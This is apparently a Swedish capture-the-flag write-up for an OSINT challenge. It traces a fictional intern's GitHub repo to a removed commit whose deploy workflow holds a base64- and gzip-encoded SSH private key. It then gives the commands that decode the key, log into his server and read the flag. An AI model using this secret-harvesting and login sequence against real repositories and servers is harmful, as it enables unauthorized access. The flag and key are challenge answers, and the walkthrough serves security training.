Kategori
OSINT
Beskrivning
Ossian Wallengren började förra året ett internship på Cyber Caching Inc. Din uppgift är att förbereda för ett kommande pentest genom att samla information om deras infrastruktur, och enligt uppgifter ni fått tag på sparar Ossian Wallengren inloggningsuppgifter till sin arbetsplats på sin personliga webbserver. Börja med att ta dig in på hans server.
Lösning
Söker man efter Ossian Wallengren på internet så hittar man ett antal olika profiler på sociala medier.
Vi kan även hitta ett GitHub-konto som tillhör Ossian Wallengren.
På GitHub-kontot kan vi hitta ett repo för ossianwallengren.se, som innehåller hans privata webbsida.
Kollar vi commit-historiken på repot så kan vi se ett antal commits. En av dessa är en blog-post som tar upp hur man tar bort commits om man t.ex har råkat checka in hemligheter.
I blog-posten kan vi hitta committen som innehåller hemligheter.

För att komma åt committen så kan vi hämta den specifika commiten på GitHub.
Hemligheterna som är incheckade i committen kan hittas i .github/workflows/deploy.yml.
name: Deploy
on:
push:
branches: [ main ]
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- name: Git checkout
uses: actions/checkout@v4
- name: Load SSH keys
run: |
mkdir -p ~/.ssh
echo "ossianwallengren.se ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF/R5/TEFX6HMdHUhwB2tdesdvw7pDt4UDHcgem1cyrh" >> ~/.ssh/known_hosts
echo "H4sIACfwqWYAA52Qu26DQBREe76C3kI87JBQpNiFDcaY5Y2BzhCbmKcXcIj5+rCWIqVJk1OMrnRHo9Fw3AJEuoFZ20HY97es4xkRCBBrooQ+OSZbwzpr8XxUxT6Nq/G9RIAC9afPrAnpibJGuaUu+AFSsSaq45xLxZgeGPeOg/DLpiYVBjt90FTZ7LfQKRVntZmJbplVGFkXJI49AN31RCp+7s1i8e+0PvA3nSwIN8YEv1P/G8rQ0uo1lmq3LRskpBC2pXJO/M6p5XV0bYifkxPev2SFqMfNWbSq42TtOzLkaOUI/HNpd8lEGM8L70ZwkAagXmqZBLw9kMcAjbI0rD+yAqlgct9gkb8yjzkR1v6e+htYKoFTjwEAAA==" | base64 -d | gunzip > ~/.ssh/id_ed25519
chmod 600 ~/.ssh/id_ed25519
- name: Run docker compose up
run: docker compose up -d --build
env:
DOCKER_HOST: "ssh://ossian@ossianwallengren.se"
DOCKER_BUILDKIT: "0"
Vi kan se att Ossian Wallengren har lagt in sina SSH-nycklar i known_hosts och id_ed25519 för att kunna logga in på sin server.
Kör vi kommandot echo "H4sIACfwqWYAA52Qu26DQBREe76C3kI87JBQpNiFDcaY5Y2BzhCbmKcXcIj5+rCWIqVJk1OMrnRHo9Fw3AJEuoFZ20HY97es4xkRCBBrooQ+OSZbwzpr8XxUxT6Nq/G9RIAC9afPrAnpibJGuaUu+AFSsSaq45xLxZgeGPeOg/DLpiYVBjt90FTZ7LfQKRVntZmJbplVGFkXJI49AN31RCp+7s1i8e+0PvA3nSwIN8YEv1P/G8rQ0uo1lmq3LRskpBC2pXJO/M6p5XV0bYifkxPev2SFqMfNWbSq42TtOzLkaOUI/HNpd8lEGM8L70ZwkAagXmqZBLw9kMcAjbI0rD+yAqlgct9gkb8yjzkR1v6e+htYKoFTjwEAAA==" | base64 -d | gunzip > id_ed25519 så kan vi exportera Ossians privata nyckel.
Vi kan nu logga in på Ossians server med nyckeln och läsa flaggan.
ssh ossian@ossianwallengren.se -i ./id_ed25519
ossianwallengren:~$ ls -al
total 20
drwxr-sr-x 1 ossian ossian 4096 Nov 15 12:31 .
drwxr-xr-x 1 root root 4096 Nov 15 12:26 ..
drwxr-sr-x 2 root ossian 4096 Nov 15 12:31 .ssh
-rw-r--r-- 1 root ossian 47 Nov 15 12:26 flag.txt
ossianwallengren:~$ cat flag.txt
cratectf{den_där_guiden_funkade_ju_inte_alls}